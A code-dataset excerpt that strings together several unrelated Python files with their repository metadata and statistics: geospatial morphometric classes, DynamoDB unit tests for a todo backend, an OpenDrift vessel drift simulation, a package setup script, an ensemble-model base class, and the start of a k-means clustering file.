----------
series : Series
Series containing resulting values
gdf : GeoDataFrame
original GeoDataFrame
sw : libpysal.weights
spatial weights matrix
Examples
--------
>>> buildings_df['wall_length'] = mm.PerimeterWall(buildings_df).series
Calculating spatial weights...
Spatial weights ready...
100%|██████████| 144/144 [00:00<00:00, 4171.39it/s]
Notes
-----
It might take a while to compute this character.
"""
def __init__(self, gdf, spatial_weights=None):
self.gdf = gdf
if spatial_weights is None:
print("Calculating spatial weights...")
from libpysal.weights import Queen
spatial_weights = Queen.from_dataframe(gdf, silence_warnings=True)
print("Spatial weights ready...")
self.sw = spatial_weights
# dict to store walls for each uID
walls = {}
components = pd.Series(spatial_weights.component_labels, index=range(len(gdf)))
geom = gdf.geometry
for i in tqdm(range(gdf.shape[0]), total=gdf.shape[0]):
# if the id is already present in walls, continue (avoid repetition)
if i in walls:
continue
else:
comp = spatial_weights.component_labels[i]
to_join = components[components == comp].index
joined = geom.iloc[to_join]
dissolved = joined.buffer(
0.01
).unary_union # buffer to avoid multipolygons where buildings touch by corners only
for b in to_join:
walls[b] = dissolved.exterior.length
results_list = []
for i in tqdm(range(gdf.shape[0]), total=gdf.shape[0]):
results_list.append(walls[i])
self.series = pd.Series(results_list, index=gdf.index)
class SegmentsLength:
"""
Calculate the cummulative and/or mean length of segments.
Length of segments within set topological distance from each of them.
Reached topological distance should be captured by ``spatial_weights``. If ``mean=False`` it
will compute sum of length, if ``mean=True`` it will compute sum and mean.
Parameters
----------
gdf : GeoDataFrame
GeoDataFrame containing streets (edges) to analyse
spatial_weights : libpysal.weights, optional
spatial weights matrix - If None, Queen contiguity matrix will be calculated
based on streets (note: spatial_weights should be based on index, not unique ID).
mean : boolean, optional
If mean=False it will compute sum of length, if mean=True it will compute
sum and mean
Attributes
----------
series : Series
Series containing resulting total lengths
mean : Series
Series containing resulting total lengths
sum : Series
Series containing resulting total lengths
gdf : GeoDataFrame
original GeoDataFrame
sw : libpysal.weights
spatial weights matrix
Examples
--------
>>> streets_df['length_neighbours'] = mm.SegmentsLength(streets_df, mean=True).mean
Calculating spatial weights...
Spatial weights ready...
"""
def __init__(self, gdf, spatial_weights=None, mean=False):
self.gdf = gdf
if spatial_weights is None:
print("Calculating spatial weights...")
from libpysal.weights import Queen
spatial_weights = Queen.from_dataframe(gdf, silence_warnings=True)
print("Spatial weights ready...")
self.sw = spatial_weights
lenghts = gdf.geometry.length
sums = []
means = []
for index in tqdm(gdf.index, total=gdf.shape[0]):
neighbours = spatial_weights.neighbors[index].copy()
if neighbours:
neighbours.append(index)
else:
neighbours = [index]
dims = lenghts.iloc[neighbours]
if mean:
means.append(np.mean(dims))
sums.append(sum(dims))
self.series = self.sum = pd.Series(sums, index=gdf.index)
if mean:
self.mean = pd.Series(means, index=gdf.index)
| 33.798604 | 146 | 0.578643 | 3,836 | 33,900 | 5.02633 | 0.125912 | 0.041388 | 0.030808 | 0.025725 | 0.583943 | 0.545822 | 0.494321 | 0.458586 | 0.423733 | 0.388777 | 0 | 0.018534 | 0.323569 | 33,900 | 1,002 | 147 | 33.832335 | 0.820113 | 0.430885 | 0 | 0.434466 | 0 | 0 | 0.034149 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038835 | false | 0 | 0.024272 | 0 | 0.101942 | 0.009709 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b618144cd7630733cffae5d1cb9672a7fba58e | 6,430 | py | Python | tests/test_db.py | craymaru/serverless-todo-backend | 5f0bd32b321e783fbdcab2714ccd0cdee30f6156 | [
"MIT"
] | 1 | 2020-12-08T09:16:27.000Z | 2020-12-08T09:16:27.000Z | tests/test_db.py | craymaru/serverless-todo-backend | 5f0bd32b321e783fbdcab2714ccd0cdee30f6156 | [
"MIT"
] | null | null | null | tests/test_db.py | craymaru/serverless-todo-backend | 5f0bd32b321e783fbdcab2714ccd0cdee30f6156 | [
"MIT"
] | null | null | null | import operator
import pytest
from chalice import NotFoundError
import app
from tests.testdata.ddb_items import TESTDATA_DDB_ITEMS
DEFAULT_USERNAME = 'default'
class TestDB:
pass
class TestListAllItems(TestDB):
def test_Return_all_items(self, mock):
"""list_all_items: すべてのアイテムを取得することができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
assert app.get_app_db().list_all_items() == TESTDATA_DDB_ITEMS
class TestListItems(TestDB):
def test_Return_items_by_username(self, mock):
"""list_items: ユーザーdefaultのアイテムをすべて取得することができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
query = ''
actual = app.get_app_db().list_items(query=query, username=DEFAULT_USERNAME)
actual = sorted(actual, key=operator.itemgetter('uid'))
expected = [item for item in TESTDATA_DDB_ITEMS
if item['username'] == DEFAULT_USERNAME]
expected = sorted(expected, key=operator.itemgetter('uid'))
assert actual == expected
@pytest.mark.parametrize('query', ['🐈', '🍆'])
def test_Return_items_by_query(self, query, mock):
"""list_items: ユーザーdefaultのアイテムからクエリを満たすものをすべて取得することができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().list_items(query=query, username=DEFAULT_USERNAME)
actual.sort(key=operator.itemgetter('uid'))
expected = [item for item in TESTDATA_DDB_ITEMS
if item['username'] == DEFAULT_USERNAME]
expected = [item for item in expected
if query in item['subject'] or query in item['description']]
expected = sorted(expected, key=operator.itemgetter('uid'))
assert actual == expected
class TestAddItem(TestDB):
@pytest.mark.parametrize('item', TESTDATA_DDB_ITEMS)
def test_Return_uid_str_cace_subject_description(self, item):
"""add_item: subjectとdescriptionがあるケース、正常にクエリを投げuidを受け取ることができる"""
actual = app.get_app_db().add_item(
subject=item['subject'],
description=item['description'],
username=DEFAULT_USERNAME)
assert type(actual) == str
assert len(actual) == 36
# 以下の状況によりこのテストケースは現時点において実施しない (2020-11-30)
#
# [状況] Amazon DynamoDB 2020-05-18 以降の仕様では、
# 文字列型/バイナリ型の項目について空の文字列「''」を許すようになっている
# 本テストに使用している moto による DynamoDB のモックの仕様は現時点においてまだ追従していないため、
# 空の文字列の登録許さないため、このテストケースを実行するとエラーが発生してしまう
# この状況があてはまらなくなったら、適宜コメントアウトを外し以下のテストケースを実施する
#
# @pytest.mark.parametrize('item', TESTDATA_DDB_ITEMS)
# def test_Return_uid_str_cace_subject_only(self, item):
# """add_item: subjectのみのケース、正常にクエリを投げuidを受け取ることができる"""
# actual = app.get_app_db().add_item(
# subject=item['subject'],
# username=DEFAULT_USERNAME)
# assert type(actual) == str
# assert len(actual) == 36
def test_Raise_case_description_only(self):
"""add_item: descriptionのみのケース、例外を発生させることができる"""
with pytest.raises(TypeError):
app.get_app_db().add_item(
description='',
username=DEFAULT_USERNAME)
class TestGetItem(TestDB):
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_item(self, mock, item):
"""get_item: uidが存在するケース、itemを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
assert app.get_app_db().get_item(
uid=item['uid'], username=item['username']) == item
def test_Raise_NotFoundError_case_uid_not_exist(self, mock):
"""get_item: uidが存在しないケース、例外を発生させることができる"""
with pytest.raises(NotFoundError):
app.get_app_db().get_item("_NOT_EXIST_UID", username=DEFAULT_USERNAME)
class TestDeleteItem(TestDB):
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_str(self, mock, item):
"""delete_item: uidが存在するケース、削除したitemのuidを正常に返すことができる"""
mock.table.put_items([item])
assert app.get_app_db().delete_item(
item['uid'], username=item['username']) == item['uid']
def test_Raise_NotFoundError_case_uid_not_exist(self, mock):
"""delete_item: uidが存在しないケース、例外を発生させることができる"""
with pytest.raises(NotFoundError):
app.get_app_db().delete_item("_NOT_EXIST_UID", username=DEFAULT_USERNAME)
class TestUpdateItem(TestDB):
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_case_all_attributes(self, mock, item):
"""update_item: すべての属性を更新するケース、更新したitemのuidを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().update_item(
uid=item['uid'],
subject=item['subject']+"_updated",
description=item['description']+"_updated",
state=item['state'],
username=item['username'])
assert actual == item['uid']
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_case_subject_only(self, mock, item):
"""update_item: subjectを更新するケース、更新したitemのuidを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().update_item(
uid=item['uid'],
subject=item['subject']+"_updated",
username=item['username'])
assert actual == item['uid']
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_case_description_only(self, mock, item):
"""update_item: descriptionを更新するケース、更新したitemのuidを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().update_item(
uid=item['uid'],
description=item['description']+"_updated",
username=item['username'])
assert actual == item['uid']
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_case_state_only(self, mock, item):
"""update_item: stateを更新するケース、更新したitemのuidを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().update_item(
uid=item['uid'],
state=item['state'],
username=item['username'])
assert actual == item['uid']
def test_Raise_NotFoundError_case_uid_not_exist(self, mock):
"""update_item: uidが存在しないケース、例外を発生させることができる"""
with pytest.raises(NotFoundError):
app.get_app_db().update_item("_NOT_EXIST_UID", username=DEFAULT_USERNAME)
| 38.502994 | 85 | 0.671851 | 719 | 6,430 | 5.724618 | 0.154381 | 0.056122 | 0.081633 | 0.040087 | 0.685374 | 0.652818 | 0.604956 | 0.587707 | 0.566812 | 0.566812 | 0 | 0.003942 | 0.210886 | 6,430 | 166 | 86 | 38.73494 | 0.806858 | 0.196112 | 0 | 0.524272 | 0 | 0 | 0.060397 | 0 | 0 | 0 | 0 | 0 | 0.106796 | 1 | 0.135922 | false | 0.009709 | 0.048544 | 0 | 0.252427 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b63f8dd16194a8fc997b6be8fdf43178a1bc65 | 11,651 | py | Python | src/vessel-drift-analysis/scripts/simulations/launch_drift.py | yosoyjay/project-nps-vessel-drift | 1cdc14ef87db31fa03b0c3bdc1d60c332727ef57 | [
"MIT"
] | null | null | null | src/vessel-drift-analysis/scripts/simulations/launch_drift.py | yosoyjay/project-nps-vessel-drift | 1cdc14ef87db31fa03b0c3bdc1d60c332727ef57 | [
"MIT"
] | null | null | null | src/vessel-drift-analysis/scripts/simulations/launch_drift.py | yosoyjay/project-nps-vessel-drift | 1cdc14ef87db31fa03b0c3bdc1d60c332727ef57 | [
"MIT"
] | null | null | null | #!python
"""Launch vessel drift simulations.
Methodology
-----------
For every week with forcing data, simulated vessels are launched from every cell where
a vessel was present in the AIS data.
The drift angle (up to 60 deg.), windage scaling (2% - 10% of 10 m), and left/right
direction is randomly assigned per simulated vessel.
"""
import datetime
import logging
import time
from dataclasses import dataclass
from pathlib import Path
from typing import List
import numpy as np
import rasterio
from opendrift.models.basemodel import OpenDriftSimulation
from opendrift.models.oceandrift import LagrangianArray
from opendrift.readers import reader_netCDF_CF_generic, reader_shape
from rasterio import warp
logging.basicConfig(level=logging.WARNING)
RANGE_LIMIT_RADS = 60 * np.pi / 180
TIF_DIR = '/mnt/store/data/assets/nps-vessel-spills/ais-data/ais-data-2015-2020/processed_25km/2019/epsg4326'
class Vessel(LagrangianArray):
"""Extend LagrangianArray for use with Alaskan Vessel Drift Project."""
variables = LagrangianArray.add_variables([
(
'wind_scale',
{
'dtype': np.float32,
'units': '1',
'default': 1
}
),
(
'wind_offset',
{
'dtype': np.float32,
'units': '1',
'default': 1
}
)
])
class AlaskaDrift(OpenDriftSimulation):
ElementType = Vessel
required_variables = [
'x_wind',
'y_wind',
'eastward_sea_water_velocity',
'northward_sea_water_velocity',
'eastward_sea_ice_velocity',
'northward_sea_ice_velocity',
'sea_ice_area_fraction',
'land_binary_mask'
]
def seed_elements(
self,
lon,
lat,
radius=0,
number=None,
time=None,
seed=187,
range_limit_rads=RANGE_LIMIT_RADS,
**kwargs
):
if number is None:
number = self.get_config('seed:number_of_elements')
# drift is going to be a random value between 2% - 10% of wind
# (b - a) * random_sample + a
# a = 0.02
# b = 0.1
wind_scale = (0.1 - 0.02) * np.random.random_sample((number,)) + 0.02
# offset is -60 deg. to 60 deg.
# a = -60
# b = 60
# (60 - (-60)) * random_sample + (-60)
wind_offset = (range_limit_rads + range_limit_rads) * np.random.random_sample((number,)) - range_limit_rads # noqa
super(AlaskaDrift, self).seed_elements(
lon=lon,
lat=lat,
radius=radius,
number=number,
time=time,
wind_scale=wind_scale,
wind_offset=wind_offset,
**kwargs
)
def update(self):
"""Update ship position taking into account wind, currents, stokes, and ice."""
# Inspired by `advect_oil`
if hasattr(self.environment, 'sea_ice_area_fraction'):
ice_area_fraction = self.environment.sea_ice_area_fraction
# Above 70%–80% ice cover, the oil moves entirely with the ice.
k_ice = (ice_area_fraction - 0.3) / (0.8 - 0.3)
k_ice[ice_area_fraction < 0.3] = 0
k_ice[ice_area_fraction > 0.8] = 1
factor_stokes = (0.7 - ice_area_fraction) / 0.7
factor_stokes[ice_area_fraction > 0.7] = 0
else:
k_ice = 0
factor_stokes = 1
# 1. update wind
windspeed = np.sqrt(self.environment.x_wind**2 + self.environment.y_wind**2)
windspeed *= self.elements.wind_scale
# update angle using random offset +- 60 deg
# windir is in rads, so need to convert
winddir = np.arctan2(self.environment.y_wind, self.environment.x_wind)
winddir += self.elements.wind_offset
wind_x = windspeed * np.cos(winddir)
wind_y = windspeed * np.sin(winddir)
# Scale wind by ice factor
wind_x = wind_x * (1 - k_ice)
wind_y = wind_y * (1 - k_ice)
self.update_positions(wind_x, wind_y)
# 2. update with sea_water_velocity
# This assumes x_sea_water_velocity and not eastward_sea_water_velocity...
#self.advect_ocean_current(factor=1 - k_ice)
self.update_positions(
self.environment.eastward_sea_water_velocity * (1 - k_ice),
self.environment.northward_sea_water_velocity * (1 - k_ice)
)
# 3. Advect with ice
self.advect_with_sea_ice(factor=k_ice)
# Deactivate elements that hit the land mask
self.deactivate_elements(
self.environment.land_binary_mask == 1,
reason='ship stranded'
)
@dataclass
class SimulationConfig:
"""Configuration for a single OpenDrift simulation"""
start_date: datetime.datetime
readers: List
number: int
radius: float = 25000 # this is meters from given x,y point
time_step: int = 900
time_step_output: int = 3600
duration: datetime.timedelta = datetime.timedelta(days=7)
outfile: str = None
loglevel: int = logging.INFO
def lonlat_from_tif(date, tif_file, dst_crs=rasterio.crs.CRS.from_epsg(4326)):
"""Return (lon, lat) in TIFF with cell value > 0"""
with rasterio.open(tif_file) as ds:
src_crs = ds.crs
idx = np.argwhere(ds.read(1))
x, y = ds.xy(idx[:, 0], idx[:, 1])
lon, lat = warp.transform(
src_crs,
dst_crs,
x,
y
)
# need to change from [-180, 180] to [0, 360]
lon = np.array(lon) % 360
lat = np.array(lat)
return lon, lat
# ~2 min per test
def run_sims_for_date(run_config, tif_dir=TIF_DIR):
vessel_types = ['cargo', 'other', 'passenger', 'tanker']
# Run simulation using data for start date for every vessel type
month = run_config.start_date.month
tif_files = list(Path(tif_dir).glob('*.tif'))
tif_files.sort()
base_fname = run_config.outfile
for vessel_type in vessel_types:
try:
tif_file = list(Path(tif_dir).glob(f'{vessel_type}_2019{month:02}01-2019*.tif'))[0]
except IndexError:
if month == 12:
tif_file = list(Path(tif_dir).glob(f'{vessel_type}_2019{month:02}01-2020*.tif'))[0]
else:
raise IndexError(f"No AIS data found for {month}")
logging.info(f'Starting simulation preparation for {tif_file=}')
vessel_type = tif_file.name.split('.')[0].split('_')[0]
# prepend out name with vessel type
outfile = vessel_type + '_' + base_fname
# release points from each ais location where a vessel was in the past
lons, lats = lonlat_from_tif(run_config.start_date, tif_file)
# launch vessel simulation
vessel_sim = AlaskaDrift(loglevel=run_config.loglevel)
vessel_sim.add_reader(run_config.readers)
for i in range(run_config.number):
vessel_sim.seed_elements(
lon=lons,
lat=lats,
time=run_config.start_date,
number=len(lons),
radius=run_config.radius
)
# Disabling the automatic GSHHG landmask
vessel_sim.set_config('general:use_auto_landmask', False)
# Backup velocities
vessel_sim.set_config('environment:fallback:sea_ice_area_fraction', 0)
vessel_sim.set_config('environment:fallback:northward_sea_ice_velocity', 0)
vessel_sim.set_config('environment:fallback:eastward_sea_ice_velocity', 0)
vessel_sim.set_config('environment:fallback:northward_sea_water_velocity', 0)
vessel_sim.set_config('environment:fallback:eastward_sea_water_velocity', 0)
vessel_sim.set_config('environment:fallback:x_wind', 0)
vessel_sim.set_config('environment:fallback:y_wind', 0)
vessel_sim.run(
time_step=run_config.time_step,
time_step_output=run_config.time_step_output,
duration=run_config.duration,
outfile=outfile
)
def run_simulations(
days=7,
number=50,
radius=5000,
timestep=900,
output_timestep=3600,
tif_dir=TIF_DIR,
loglevel=logging.INFO
):
# start date possible to launch drifter, limited by availability of HYCOM data
start_date = datetime.datetime(2019, 1, 8)
# last date possible to launch drifter, limited by availability of NAM data (2019-12-17)
last_date = datetime.datetime(2019, 12, 10)
date = start_date
duration = datetime.timedelta(days=days)
# currents + ice
hycom_file = '/mnt/store/data/assets/nps-vessel-spills/forcing-files/hycom/final-files/hycom.nc'
# Provide a name mapping to work with package methods:
name_map = {
'eastward_sea_water_velocity': 'x_sea_water_velocity',
'northward_sea_water_velocity': 'y_sea_water_velocity',
'siu': 'x_sea_ice_velocity',
'siv': 'y_sea_ice_velocity',
}
hycom_reader = reader_netCDF_CF_generic.Reader(hycom_file, standard_name_mapping=name_map)
# winds
fname = '/mnt/store/data/assets/nps-vessel-spills/forcing-files/nam/regrid/nam.nc'
nam_reader = reader_netCDF_CF_generic.Reader(fname)
# land - cannot use default landmask as it is -180, 180
# Instead, we use the same landmask with lons shifted to 0, 360
fname = '/mnt/store/data/assets/nps-vessel-spills/sim-scripts/drift/world_0_360.shp'
reader_landmask = reader_shape.Reader.from_shpfiles(fname)
# Reader order matters. first reader sets the projection for the simulation.
readers = [hycom_reader, nam_reader, reader_landmask]
sim_start_time = time.perf_counter()
while date <= last_date:
try:
logging.info(f'simulation started for {date:%Y-%m-%d}')
start_time = time.perf_counter()
output_fname = f'alaska_drift_{date:%Y-%m-%d}.nc'
config = SimulationConfig(
date,
readers,
number,
radius,
timestep,
output_timestep,
duration,
output_fname,
loglevel
)
run_sims_for_date(config, tif_dir)
end_time = time.perf_counter()
total_time = int(end_time - start_time)
logging.info(f'simulation complete {total_time} s')
except Exception as e:
logging.warning(f'simulation failed for {date:%Y-%m-%d}')
logging.warning(str(e))
date = date + datetime.timedelta(days=days)
sim_end_time = time.perf_counter()
total_sim_time = int(sim_end_time - sim_start_time)
logging.info(f'total sim time {total_sim_time} s')
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
'-n',
'--number',
default=50,
type=int,
help='Number of vessels to launch per simulation'
)
parser.add_argument(
'-r',
'--radius',
default=25000,
type=float,
help='Max distance from release point to launch vessel (in meters)'
)
parser.add_argument(
'-a',
'--ais',
default=TIF_DIR,
type=str,
help='Path to dir with AIS tifs for release points'
)
args = parser.parse_args()
run_simulations(
days=7,
number=args.number,
radius=args.radius,
timestep=900,
output_timestep=86400,
tif_dir=args.ais,
loglevel=logging.INFO
)
if __name__ == '__main__':
main()
| 32.912429 | 122 | 0.618488 | 1,490 | 11,651 | 4.618121 | 0.239597 | 0.015114 | 0.030228 | 0.020927 | 0.224967 | 0.182677 | 0.126144 | 0.095771 | 0.083127 | 0.047377 | 0 | 0.029799 | 0.282808 | 11,651 | 353 | 123 | 33.005666 | 0.793562 | 0.167282 | 0 | 0.089494 | 0 | 0.015564 | 0.164349 | 0.100851 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023346 | false | 0.003891 | 0.050584 | 0 | 0.136187 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b6d6a32049f0dfb679101cd399346994e52f62 | 932 | py | Python | setup.py | bobbypaton/pyX-Struct | c6e7132f010635ebc95aea09cef75247271026de | [
"MIT"
] | 6 | 2018-09-01T21:00:20.000Z | 2022-01-11T11:13:38.000Z | setup.py | bobbypaton/pyX-Struct | c6e7132f010635ebc95aea09cef75247271026de | [
"MIT"
] | null | null | null | setup.py | bobbypaton/pyX-Struct | c6e7132f010635ebc95aea09cef75247271026de | [
"MIT"
] | null | null | null | from setuptools import setup
import io
# read the contents of your README file
from os import path
this_directory = path.abspath(path.dirname(__file__))
with io.open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name = 'pyxstruct',
packages = ['pyxstruct'],
version = '1.0.3',
description = 'Scrape Geometric X-ray Data from the Cambridge Structural Database ',
long_description=long_description,
long_description_content_type='text/markdown',
author = 'Paton Research Group',
author_email = 'robert.paton@colostate.edu',
url = 'https://github.com/bobbypaton/pyX-Struct',
download_url = 'https://github.com/bobbypaton/pyX-Struct/archive/v1.0.3.zip',
keywords = ['x-ray structure', 'CCDC', 'SMILES', 'python'],
classifiers = [],
install_requires=["numpy","seaborn","pandas","matplotlib"],
python_requires='>=2.6',
include_package_data=True,
)
| 33.285714 | 86 | 0.722103 | 124 | 932 | 5.282258 | 0.677419 | 0.091603 | 0.058015 | 0.091603 | 0.109924 | 0.109924 | 0.109924 | 0 | 0 | 0 | 0 | 0.01107 | 0.127682 | 932 | 27 | 87 | 34.518519 | 0.794588 | 0.0397 | 0 | 0 | 0 | 0.043478 | 0.365471 | 0.029148 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.130435 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44ba14a55225e2fca7e6776005ca90c19e46d4ef | 7,317 | py | Python | hypernets/tabular/ensemble/base_ensemble.py | Enpen/Hypernets | 5fbf01412ffaef310855d98f52f8cc169e96246b | [
"Apache-2.0"
] | null | null | null | hypernets/tabular/ensemble/base_ensemble.py | Enpen/Hypernets | 5fbf01412ffaef310855d98f52f8cc169e96246b | [
"Apache-2.0"
] | null | null | null | hypernets/tabular/ensemble/base_ensemble.py | Enpen/Hypernets | 5fbf01412ffaef310855d98f52f8cc169e96246b | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
__author__ = 'yangjian'
"""
"""
import copy
import pickle
from sklearn.model_selection import StratifiedKFold
from hypernets.utils import fs
class BaseEnsemble:
import numpy as np
def __init__(self, task, estimators, need_fit=False, n_folds=5, method='soft', random_state=9527):
self.task = task
self.estimators = list(estimators)
self.need_fit = need_fit
self.method = method
self.n_folds = n_folds
self.random_state = random_state
self.classes_ = None
for est in estimators:
if est is not None and self.classes_ is None and hasattr(est, 'classes_'):
self.classes_ = est.classes_
break
def _estimator_predict(self, estimator, X):
if self.task == 'regression':
pred = estimator.predict(X)
else:
# if self.classes_ is None and hasattr(estimator, 'classes_'):
# self.classes_ = estimator.classes_
assert self.classes_ is not None
pred = estimator.predict_proba(X)
if self.method == 'hard':
pred = self.proba2predict(pred)
return pred
def _cross_validator(self):
return StratifiedKFold(n_splits=self.n_folds, shuffle=True, random_state=self.random_state)
def proba2predict(self, proba, proba_threshold=0.5):
assert len(proba.shape) <= 2
if self.task == 'regression':
return proba
if len(proba.shape) == 2:
if proba.shape[-1] > 2:
predict = proba.argmax(axis=-1)
else:
predict = (proba[:, -1] > proba_threshold).astype('int32')
else:
predict = (proba > proba_threshold).astype('int32')
return predict
def fit(self, X, y, est_predictions=None):
assert y is not None
if est_predictions is not None:
self._validate_predictions(X, y, est_predictions)
else:
assert X is not None
if self.need_fit:
est_predictions = self._Xy2predicttions(X, y)
else:
est_predictions = self._X2predictions(X)
self.fit_predictions(est_predictions, y)
def _validate_predictions(self, X, y, est_predictions):
# print(f'est_predictions.shape:{est_predictions.shape}, estimators:{len(self.estimators)}')
if self.task == 'regression' or self.method == 'hard':
assert est_predictions.shape == (len(y), len(self.estimators)), \
f'shape is not equal, may be a wrong task type. task:{self.task}, ' \
f'est_predictions.shape: {est_predictions.shape}, ' \
f'(len(y), len(self.estimators)):{(len(y), len(self.estimators))}'
else:
assert len(est_predictions.shape) == 3
assert est_predictions.shape[0] == len(y)
assert est_predictions.shape[1] == len(self.estimators)
def _Xy2predicttions(self, X, y):
if self.task == 'regression' or self.method == 'hard':
np = self.np
est_predictions = np.zeros((len(y), len(self.estimators)), dtype=np.float64)
else:
est_predictions = None
iterators = self._cross_validator()
for fold, (train, test) in enumerate(iterators.split(X, y)):
for n, estimator in enumerate(self.estimators):
X_train = X.iloc[train]
y_train = y.iloc[train]
X_test = X.iloc[test]
estimator.fit(X_train, y_train)
if self.classes_ is None and hasattr(estimator, 'classes_'):
self.classes_ = estimator.classes_
pred = self._estimator_predict(estimator, X_test)
if est_predictions is None:
np = self.np
est_predictions = np.zeros((len(y), len(self.estimators), pred.shape[1]), dtype=np.float64)
est_predictions[test, n] = pred
return est_predictions
def _X2predictions(self, X):
np = self.np
if self.task == 'regression' or self.method == 'hard':
est_predictions = np.zeros((len(X), len(self.estimators)), dtype=np.float64)
else:
est_predictions = np.zeros((len(X), len(self.estimators), len(self.classes_)), dtype=np.float64)
for n, estimator in enumerate(self.estimators):
if estimator is not None:
pred = self._estimator_predict(estimator, X)
if self.task == 'regression' and len(pred.shape) > 1:
assert pred.shape[1] == 1
pred = pred.reshape(pred.shape[0])
est_predictions[:, n] = pred
return est_predictions
def predict(self, X):
est_predictions = self._X2predictions(X)
pred = self.predictions2predict(est_predictions)
if self.task != 'regression' and self.classes_ is not None:
np = self.np
pred = np.take(np.array(self.classes_), pred, axis=0)
return pred
def predict_proba(self, X):
est_predictions = self._X2predictions(X)
return self.predictions2predict_proba(est_predictions)
def fit_predictions(self, predictions, y_true):
raise NotImplementedError()
def predictions2predict_proba(self, predictions):
raise NotImplementedError()
def predictions2predict(self, predictions):
raise NotImplementedError()
def save(self, model_path):
if not model_path.endswith(fs.sep):
model_path = model_path + fs.sep
if not fs.exists(model_path):
fs.mkdirs(model_path, exist_ok=True)
stub = copy.copy(self)
estimators = self.estimators
if estimators is not None:
stub.estimators = [None for _ in estimators] # keep size
if estimators is not None:
for i, est in enumerate(estimators):
est_pkl = f'{model_path}{i}.pkl'
est_model = f'{model_path}{i}.model'
for t in [est_pkl, est_model]:
if fs.exists(t):
fs.rm(t)
if est is None:
continue
with fs.open(est_pkl, 'wb') as f:
pickle.dump(est, f, protocol=pickle.HIGHEST_PROTOCOL)
if hasattr(est, 'save') and hasattr(est, 'load'):
est.save(est_model)
with fs.open(f'{model_path}ensemble.pkl', 'wb') as f:
pickle.dump(stub, f, protocol=pickle.HIGHEST_PROTOCOL)
@staticmethod
def load(model_path):
if not model_path.endswith(fs.sep):
model_path = model_path + fs.sep
with fs.open(f'{model_path}ensemble.pkl', 'rb') as f:
stub = pickle.load(f)
if stub.estimators is not None:
for i in range(len(stub.estimators)):
if fs.exists(f'{model_path}{i}.pkl'):
with fs.open(f'{model_path}{i}.pkl', 'rb') as f:
est = pickle.load(f)
if fs.exists(f'{model_path}{i}.model') and hasattr(est, 'load'):
est = est.load(f'{model_path}{i}.model')
stub.estimators[i] = est
return stub
| 38.109375 | 111 | 0.574962 | 883 | 7,317 | 4.613817 | 0.150623 | 0.099656 | 0.022091 | 0.034364 | 0.425626 | 0.303387 | 0.22975 | 0.163476 | 0.121748 | 0.088856 | 0 | 0.009406 | 0.31707 | 7,317 | 191 | 112 | 38.308901 | 0.805884 | 0.030204 | 0 | 0.228758 | 0 | 0.006536 | 0.068907 | 0.029653 | 0 | 0 | 0 | 0 | 0.058824 | 1 | 0.098039 | false | 0 | 0.03268 | 0.006536 | 0.196078 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44bdf8f5ecb0e60fa1e48ee58697351e0ea1c854 | 3,456 | py | Python | KMeansClustering/clustering.py | saberzuko/MachineLearningAlgorithms | a7072e7342b0836f195325faed169f5d1de23f76 | [
"MIT"
] | null | null | null | KMeansClustering/clustering.py | saberzuko/MachineLearningAlgorithms | a7072e7342b0836f195325faed169f5d1de23f76 | [
"MIT"
] | null | null | null | KMeansClustering/clustering.py | saberzuko/MachineLearningAlgorithms | a7072e7342b0836f195325faed169f5d1de23f76 | [
"MIT"
] | null | null | null | import numpy as np
from scipy.spatial import distance
import random
def mu_generator(X, K):
# Function to initialize the cluster centers
# The input is the training data X and the number of cluster centers
mu = []; rand_keys = []
